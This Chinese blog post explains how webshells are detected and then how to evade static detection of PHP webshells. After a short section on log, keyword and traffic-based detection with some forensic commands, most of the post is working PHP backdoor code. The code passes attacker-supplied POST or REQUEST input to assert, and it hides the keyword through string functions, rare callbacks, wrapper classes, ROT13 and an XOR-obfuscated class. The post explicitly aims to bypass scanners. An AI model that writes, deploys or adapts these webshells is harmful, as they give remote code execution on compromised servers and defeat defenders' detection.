<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/all.min.css" integrity="sha256-mUZM63G8m73Mcidfrv5E+Y61y7a12O5mW4ezU3bxqW4=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.8.1","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":false,"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>
<meta name="description" content="Webshell检测方式日志检测 使用Webshell一般不会在系统日志中留下记录，但是会在网站的web日志中留下Webshell页面的访问数据和数据提交记录。它的缺点则是存在一定误报率，对于大量的日志文件，检测工具的处理能力和效率都会变的比较低。  文件内容检测(静态检测) 静态检测是指对文件中所使用的关键词、高危函数、文件修改的时间、文件权限、文件的所有者以及和其它文件要素等多个因素进行检测，">
<meta property="og:type" content="article">
<meta property="og:title" content="静态免杀Webshell(php)">
<meta property="og:url" content="http://example.com/2022/07/30/PHP/%E9%9D%99%E6%80%81%E5%85%8D%E6%9D%80Webshell(php%EF%BC%89/index.html">
<meta property="og:site_name" content="Hack the world">
<meta property="og:description" content="Webshell检测方式日志检测 使用Webshell一般不会在系统日志中留下记录，但是会在网站的web日志中留下Webshell页面的访问数据和数据提交记录。它的缺点则是存在一定误报率，对于大量的日志文件，检测工具的处理能力和效率都会变的比较低。  文件内容检测(静态检测) 静态检测是指对文件中所使用的关键词、高危函数、文件修改的时间、文件权限、文件的所有者以及和其它文件要素等多个因素进行检测，">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2022-07-30T10:03:42.253Z">
<meta property="article:modified_time" content="2022-08-17T13:49:33.301Z">
<meta property="article:author" content="D0gekong">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="http://example.com/2022/07/30/PHP/%E9%9D%99%E6%80%81%E5%85%8D%E6%9D%80Webshell(php%EF%BC%89/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://example.com/2022/07/30/PHP/%E9%9D%99%E6%80%81%E5%85%8D%E6%9D%80Webshell(php%EF%BC%89/","path":"2022/07/30/PHP/静态免杀Webshell(php）/","title":"静态免杀Webshell(php)"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>静态免杀Webshell(php) | Hack the world</title>
  




  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">Hack the world</h1>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">Fake it till Make it</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home"><a href="/" rel="section"><i class="home fa-fw"></i>首页</a></li>
        <li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="user fa-fw"></i>关于</a></li>
        <li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="tags fa-fw"></i>标签</a></li>
        <li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="th fa-fw"></i>分类</a></li>
        <li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="archive fa-fw"></i>归档</a></li>
  </ul>
</nav>




</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Webshell%E6%A3%80%E6%B5%8B%E6%96%B9%E5%BC%8F"><span class="nav-number">1.</span> <span class="nav-text">Webshell检测方式</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%97%A5%E5%BF%97%E6%A3%80%E6%B5%8B"><span class="nav-number">2.</span> <span class="nav-text">日志检测</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E5%86%85%E5%AE%B9%E6%A3%80%E6%B5%8B-%E9%9D%99%E6%80%81%E6%A3%80%E6%B5%8B"><span class="nav-number">3.</span> <span class="nav-text">文件内容检测(静态检测)</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Webshell%E7%89%B9%E5%BE%81%E6%A3%80%E6%B5%8B"><span class="nav-number">3.0.0.1.</span> <span class="nav-text">Webshell特征检测</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E5%90%8D%E6%A3%80%E6%B5%8B"><span class="nav-number">3.0.0.2.</span> <span class="nav-text">文件名检测</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E8%A1%8C%E4%B8%BA%E6%A3%80%E6%B5%8B-%E5%8A%A8%E6%80%81%E6%A3%80%E6%B5%8B"><span class="nav-number">4.</span> <span class="nav-text">文件行为检测(动态检测)</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%B5%81%E9%87%8F%E8%A1%8C%E4%B8%BA%E7%89%B9%E5%BE%81%E6%A3%80%E6%B5%8B"><span class="nav-number">4.0.0.1.</span> <span class="nav-text">流量行为特征检测</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E9%9D%99%E6%80%81%E5%85%8D%E6%9D%80"><span class="nav-number">5.</span> <span class="nav-text">静态免杀</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%85%B3%E4%BA%8Eeval%E4%B8%8Eassert"><span class="nav-number">6.</span> <span class="nav-text">关于eval与assert</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%B0%86%E5%85%B3%E9%94%AE%E8%AF%8D%E6%B7%B7%E6%B7%86%E5%9C%A8%E7%B1%BB%E4%B8%AD%E3%80%81%E5%87%BD%E6%95%B0%E4%B8%AD"><span class="nav-number">6.0.0.1.</span> <span class="nav-text">将关键词混淆在类中、函数中</span></a></li></ol></li></ol></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="D0gekong"
      src="/images/pic.jpg">
  <p class="site-author-name" itemprop="name">D0gekong</p>
  <div class="site-description" itemprop="description">散人的漫漫学习路</div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">117</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>
  <div class="links-of-author site-overview-item animated">
      <span class="links-of-author-item">
        <a href="https://github.com/SantaJiang" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;SantaJiang" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="/jiangshengda@foxmail.com" title="E-Mail → jiangshengda@foxmail.com"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://www.jianshu.com/u/3aa0cb901bee" title="简书 → https:&#x2F;&#x2F;www.jianshu.com&#x2F;u&#x2F;3aa0cb901bee" rel="noopener" target="_blank"><i class="fab fa-jianshu fa-fw"></i>简书</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://blog.csdn.net/jsd581?spm=1010.2135.3001.5421" title="CSDN → https:&#x2F;&#x2F;blog.csdn.net&#x2F;jsd581?spm&#x3D;1010.2135.3001.5421" rel="noopener" target="_blank"><i class="fab fa-csdn fa-fw"></i>CSDN</a>
      </span>
  </div>



        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/07/30/PHP/%E9%9D%99%E6%80%81%E5%85%8D%E6%9D%80Webshell(php%EF%BC%89/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/pic.jpg">
      <meta itemprop="name" content="D0gekong">
      <meta itemprop="description" content="散人的漫漫学习路">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hack the world">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          静态免杀Webshell(php)
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2022-07-30 18:03:42" itemprop="dateCreated datePublished" datetime="2022-07-30T18:03:42+08:00">2022-07-30</time>
    </span>
      <span class="post-meta-item">
        <span class="post-meta-item-icon">
          <i class="far fa-calendar-check"></i>
        </span>
        <span class="post-meta-item-text">更新于</span>
        <time title="修改时间：2022-08-17 21:49:33" itemprop="dateModified" datetime="2022-08-17T21:49:33+08:00">2022-08-17</time>
      </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h1 id="Webshell检测方式"><a href="#Webshell检测方式" class="headerlink" title="Webshell检测方式"></a>Webshell检测方式</h1><h1 id="日志检测"><a href="#日志检测" class="headerlink" title="日志检测"></a>日志检测</h1><blockquote>
<p>使用Webshell一般不会在系统日志中留下记录，但是会在网站的web日志中留下Webshell页面的访问数据和数据提交记录。它的缺点则是存在一定误报率，对于大量的日志文件，检测工具的处理能力和效率都会变的比较低。</p>
</blockquote>
<h1 id="文件内容检测-静态检测"><a href="#文件内容检测-静态检测" class="headerlink" title="文件内容检测(静态检测)"></a>文件内容检测(静态检测)</h1><blockquote>
<p>静态检测是指对文件中所使用的关键词、高危函数、文件修改的时间、文件权限、文件的所有者以及和其它文件要素等多个因素进行检测，对已知的样本查找准确率高，但缺点是漏报率、误报率高，，而且容易被绕过。<br>具体的检测方式如下:</p>
</blockquote>
<h4 id="Webshell特征检测"><a href="#Webshell特征检测" class="headerlink" title="Webshell特征检测"></a>Webshell特征检测</h4><blockquote>
<p>使用正则表达式制定相应的规则是很常见的一种静态检测方法，通过对webshell文件进行总结，提取出常见的特征、威胁函数形成正则，再进行扫描整个文件，通过关键词匹配脚本文件找出webshell。<br>比较常见的如：</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">系统调用的命令执行函数:eval\system\cmd_shell\assert等</span><br></pre></td></tr></table></figure>
<h4 id="文件名检测"><a href="#文件名检测" class="headerlink" title="文件名检测"></a>文件名检测</h4><blockquote>
<p>有的文件名一看便知道是webshell，也是根据一些常见的webshell文件名进行总结然后再进行过滤。<br>如：</p>
</blockquote>
<p><code>backdoor.php</code>、<code>webshell.php</code>等等 </p>
<h1 id="文件行为检测-动态检测"><a href="#文件行为检测-动态检测" class="headerlink" title="文件行为检测(动态检测)"></a>文件行为检测(动态检测)</h1><blockquote>
<p>动态检测是通过Webshell运行时使用的系统命令或者网络流量的异常来判断动作的威胁程度，Webshell通常会被加密从而避开静态特征的检测，当Webshell运行时就需要向系统发送系统命令来达到执行命令。通过检测系统调用来监测甚至拦截系统命令被执行。<br>具体检测方式如下：</p>
</blockquote>
<h4 id="流量行为特征检测"><a href="#流量行为特征检测" class="headerlink" title="流量行为特征检测"></a>流量行为特征检测</h4><blockquote>
<p>webshell带有常见执行命令动作等，它的命令行为方式决定了它的数据流量中的参数具有一些明显的特征。<br>如：</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ipconfig/ifconfig/syste/whoami/net stat/eval/database/systeminfo</span><br></pre></td></tr></table></figure>
<p>攻击者在上传完webshell后肯定会执行些命令等，那么便可以去检测系统的变化以及敏感的操作，通过和之前的配置以及文件的变化对比监测系统达到发现webshell的目的<br><strong>进程分析</strong></p>
<p>利用netstat命令来分析可疑的端口、IP、PID及程序进程</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">netstat -anptu | grep </span><br></pre></td></tr></table></figure>
<p>有些进程是隐藏起来的，可以通过以下命令来查看隐藏进程</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ps -ef | awk &#x27;&#123;print&#125;&#x27; | sort -n | uniq &gt;1</span><br><span class="line">ls /proc | sort -n |uniq &gt;2 </span><br><span class="line">diff 1 2</span><br></pre></td></tr></table></figure>
<p><strong>文件分析</strong><br>通过查看/tmp /init.d /usr/bin /usr/sbin等敏感目录有无可疑的文件，针对可以的文件可使用stat进行创建修改时间、访问时间的详细查看，若修改时间距离事件日期接近，有关联，说明可能被篡改或者其他</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">stat /usr/bin</span><br></pre></td></tr></table></figure>
<p>除此之外，还可以查找新增文件的方式来查找webshell<br>查找24小时内被修改的PHP文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find ./ -mtime 0 -name &quot;*.php&quot;</span><br></pre></td></tr></table></figure>
<p>查找隐藏文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ls -ar | grep &quot;^\.&quot;</span><br></pre></td></tr></table></figure>

<p><strong>系统信息分析</strong></p>
<p>通过查看一些系统信息，来进行分析是否存在webshell</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">cat /root/.bash_history</span><br><span class="line">查看命令操作痕迹</span><br><span class="line">cat /etc/passwd</span><br><span class="line">查看有无新增的用户或者除root之外uid为0的用户</span><br><span class="line">crontab  /etc/cron*</span><br><span class="line">查看是否有后门木马程序启动相关信息</span><br></pre></td></tr></table></figure>
<h1 id="静态免杀"><a href="#静态免杀" class="headerlink" title="静态免杀"></a>静态免杀</h1><h1 id="关于eval与assert"><a href="#关于eval与assert" class="headerlink" title="关于eval与assert"></a><strong>关于eval与assert</strong></h1><p>关于eval函数在php给出的官方说明是</p>
<blockquote>
<p>eval 是一个语言构造器而不是一个函数，不能被可变函数调用。可变函数：通过一个变量，获取其对应的变量值，然后通过给该值增加一个括号()，让系统认为该值是一个函数，从而当做函数来执行 通俗的说比如你 <code>&lt;?php $a=eval;$a()?&gt;</code> 这样是不行的,造就了用eval的话达不到assert的灵活，但是在php7.1以上assert已经不行</p>
</blockquote>
<p>PHP木马静态免杀基本是通过各种加密或异或等方式来隐藏关键词</p>
<h4 id="将关键词混淆在类中、函数中"><a href="#将关键词混淆在类中、函数中" class="headerlink" title="将关键词混淆在类中、函数中"></a>将关键词混淆在类中、函数中</h4><p><strong>字符串变形：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">ucwords() //函数把字符串中每个单词的首字符转换为大写。</span><br><span class="line">ucfirst() //函数把字符串中的首字符转换为大写。</span><br><span class="line">trim() //函数从字符串的两端删除空白字符和其他预定义字符。</span><br><span class="line">substr_replace() //函数把字符串的一部分替换为另一个字符串</span><br><span class="line">substr() //函数返回字符串的一部分。</span><br><span class="line">strtr() //函数转换字符串中特定的字符。</span><br><span class="line">strtoupper() //函数把字符串转换为大写。</span><br><span class="line">strtolower() //函数把字符串转换为小写。</span><br><span class="line">strtok() //函数把字符串分割为更小的字符串</span><br><span class="line">str_rot13() //函数对字符串执行 ROT13 编码。</span><br></pre></td></tr></table></figure>
<p>用 <code>substr_replace()</code> 函数变形assert 达到免杀的效果  </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    $a = substr_replace(&quot;assexx&quot;,&quot;rt&quot;,4);</span><br><span class="line">    $a($_POST[&#x27;x&#x27;]);</span><br><span class="line"> ?&gt;</span><br></pre></td></tr></table></figure>
<p><strong>定义函数绕过</strong><br>定义一个函数把关键词分割达到bypass效果</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    function test($a)&#123; $a($_POST[&#x27;x&#x27;]);&#125; test(assert);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>反之</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    function test($a)&#123;</span><br><span class="line">        assert($a);</span><br><span class="line">    &#125;</span><br><span class="line">    test($_POST[x]);</span><br></pre></td></tr></table></figure>
<p><strong>回调函数</strong></p>
<blockquote>
<p><code>call_user_func_array()</code><br><code>call_user_func()</code><br><code>array_filter()</code><br><code>array_walk()</code><br><code>array_map()</code><br><code>registregister_shutdown_function()</code><br><code>register_tick_function()</code><br><code>filter_var()</code><br><code>filter_var_array()</code><br><code>uasort()</code><br><code>uksort()</code><br><code>array_reduce()</code><br><code>array_walk()</code><br><code>array_walk_recursive()</code><br> 大多数回调函数已经被加入规则里这里建议使用一些冷门的</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    forward_static_call_array(assert,array($_POST[x]));</span><br><span class="line">?&gt;</span><br><span class="line"></span><br><span class="line">&lt;?php</span><br><span class="line">    forward_static_call_array(assert,array($_POST[x]));</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p><strong>回调函数变形</strong><br>定义个函数 或者类来调用</p>
<p>定义一个函数</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    function test($a,$b)&#123;</span><br><span class="line">        array_map($a,$b);</span><br><span class="line">    &#125;</span><br><span class="line">    test(assert,array($_POST[&#x27;x&#x27;]));</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>定义一个类</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    class test &#123;</span><br><span class="line">        var $a;</span><br><span class="line">        var $b;</span><br><span class="line">        function __construct($a,$b) &#123;</span><br><span class="line">            $this-&gt;a=$a;</span><br><span class="line">            $this-&gt;b=$b;</span><br><span class="line">        &#125;</span><br><span class="line">        function test() &#123;</span><br><span class="line">            array_map($this-&gt;a,$this-&gt;b);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    $p1=new test(assert,array($_POST[&#x27;x&#x27;]));</span><br><span class="line">    $p1-&gt;test();</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p> 这里贴上网上师傅自己写的混淆小马，同样利用了冷门回调函数</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">function myfunction_key($a,$b)&#123;</span><br><span class="line">    if ($a===$b)&#123;</span><br><span class="line">        return 0;</span><br><span class="line">    &#125;</span><br><span class="line">    return ($a&gt;$b)?1:-1;</span><br><span class="line">&#125;</span><br><span class="line">class rtHjmCdS&#123;</span><br><span class="line">    public $fHfoj;</span><br><span class="line">    public $fDaGv;  </span><br><span class="line">    public $HgAjSd; </span><br><span class="line">    function __construct()&#123;</span><br><span class="line"></span><br><span class="line">        $_xlr=&quot;J&quot;^&quot;\x2b&quot;;</span><br><span class="line">        $_Nbv=&quot;V&quot;^&quot;\x25&quot;;</span><br><span class="line">        $_cfh=&quot;T&quot;^&quot;\x27&quot;;</span><br><span class="line">        $_PdK=&quot;I&quot;^&quot;\x2c&quot;;</span><br><span class="line">        $_zJQ=&quot;+&quot;^&quot;\x59&quot;;</span><br><span class="line">        $_RgD=&quot;=&quot;^&quot;\x49&quot;;</span><br><span class="line">        $this-&gt;fDaGv=$_xlr.$_Nbv.$_cfh.$_PdK.$_zJQ.$_RgD;</span><br><span class="line">        </span><br><span class="line">        $_fLd=&quot;a&quot;^&quot;\x0&quot;;</span><br><span class="line">        $_wOK=&quot;j&quot;^&quot;\x18&quot;;</span><br><span class="line">        $_tAH=&quot;U&quot;^&quot;\x27&quot;;</span><br><span class="line">        $_HeV=&quot;J&quot;^&quot;\x2b&quot;;</span><br><span class="line">        $_cyo=&quot;-&quot;^&quot;\x54&quot;;</span><br><span class="line">        $_iSW=&quot;F&quot;^&quot;\x19&quot;;</span><br><span class="line">        $_jYS=&quot;/&quot;^&quot;\x5a&quot;;</span><br><span class="line">        $_BFt=&quot;h&quot;^&quot;\x1&quot;;</span><br><span class="line">        $_TRn=&quot;p&quot;^&quot;\x1e&quot;;</span><br><span class="line">        $_izx=&quot;k&quot;^&quot;\x1f&quot;;</span><br><span class="line">        $_gMz=&quot;X&quot;^&quot;\x3d&quot;;</span><br><span class="line">        $_TNu=&quot;&lt;&quot;^&quot;\x4e&quot;;</span><br><span class="line">        $_UiE=&quot;v&quot;^&quot;\x5&quot;;</span><br><span class="line">        $_iHI=&quot;q&quot;^&quot;\x14&quot;;</span><br><span class="line">        $_LIK=&quot;m&quot;^&quot;\xe&quot;;</span><br><span class="line">        $_Yey=&quot;Z&quot;^&quot;\x2e&quot;;</span><br><span class="line">        $_lMr=&quot;=&quot;^&quot;\x62&quot;;</span><br><span class="line">        $_WOI=&quot;+&quot;^&quot;\x5e&quot;;</span><br><span class="line">        $_FQy=&quot;u&quot;^&quot;\x14&quot;;</span><br><span class="line">        $_sjC=&quot;d&quot;^&quot;\x17&quot;;</span><br><span class="line">        $_mOr=&quot;&gt;&quot;^&quot;\x4d&quot;;</span><br><span class="line">        $_Txf=&quot;*&quot;^&quot;\x45&quot;;</span><br><span class="line">        $_PmW=&quot;O&quot;^&quot;\x2c&quot;;</span><br><span class="line">        $this-&gt;HgAjSd=$_fLd.$_wOK.$_tAH.$_HeV.$_cyo.$_iSW.$_jYS.$_BFt.$_TRn.$_izx.$_gMz.$_TNu.$_UiE.$_iHI.$_LIK.$_Yey.$_lMr.$_WOI.$_FQy.$_sjC.$_mOr.$_Txf.$_PmW;</span><br><span class="line">        &#125;</span><br><span class="line">    </span><br><span class="line">    function __destruct()&#123;</span><br><span class="line">        </span><br><span class="line">        $Hfdag = $this-&gt;HgAjSd; //&#x27;array_uintersect_uassoc&#x27;</span><br><span class="line">        $fdJfd = $this-&gt;fDaGv; // &#x27;assert&#x27;</span><br><span class="line">        //array_uintersect_uassoc(array($_POST[k]),array(&#x27;&#x27;),&#x27;assert&#x27;,&#x27;strstr&#x27;);</span><br><span class="line">        @$Hfdag(array($this-&gt;fHfoj),array(&#x27;&#x27;),$fdJfd,&#x27;myfunction_key&#x27;);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">$jfnp=new rtHjmCdS();</span><br><span class="line">@$jfnp-&gt;fHfoj=$_REQUEST[&#x27;css&#x27;];</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>例如：使用str_rot13函数,注意assert适用于PHP5</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$c=str_rot13(&#x27;nffreg&#x27;);</span><br><span class="line">$c($_REQUEST[&#x27;x&#x27;]);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>str_rot13() 函数对字符串执行 ROT13 编码,通过编码来最终获得assert，但是这样是能被查杀出来的，可以将其隐藏在类或函数中</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">function test($a)&#123;</span><br><span class="line">$b=str_rot13(&#x27;nffreg&#x27;);</span><br><span class="line">$b($a);</span><br><span class="line">&#125;</span><br><span class="line">test($_REQUEST[&#x27;x&#x27;]);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
